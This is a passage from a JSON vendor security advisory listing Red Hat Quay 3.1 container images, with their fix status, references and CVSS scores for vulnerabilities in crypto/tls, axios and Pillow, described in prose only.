"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: Unexpected session resumption in crypto/tls"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
